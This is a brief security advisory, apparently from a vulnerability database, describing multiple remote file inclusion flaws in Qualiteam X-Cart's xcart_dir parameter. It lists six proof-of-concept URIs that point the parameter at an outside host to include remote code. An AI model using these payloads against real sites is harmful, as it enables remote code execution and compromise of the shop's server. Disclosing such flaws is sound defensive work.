|
Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser. The following proof-of-concept URIs are available: http://www.example.com/[xcart-path]/config.php?xcart_dir=http://www.example2.com /[inject]? http://www.example.com/[xcart-path]/prepare.php?xcart_dir=http://www.example2.com /[inject]? http://www.example.com/[xcart-path]/smarty.php?xcart_dir=http://www.example2.com /[inject]? http://www.example.com/[xcart-path]/customer/product.php?xcart_dir=http://www.example2.com /[inject]? http://www.example.com/[xcart-path]/provider/auth.php?xcart_dir=http://www.example2.com /[inject]? http://www.example.com/[xcart-path]/admin/auth.php?xcart_dir=http://www.example2.com /[inject]? |
|
|
Privacy Statement |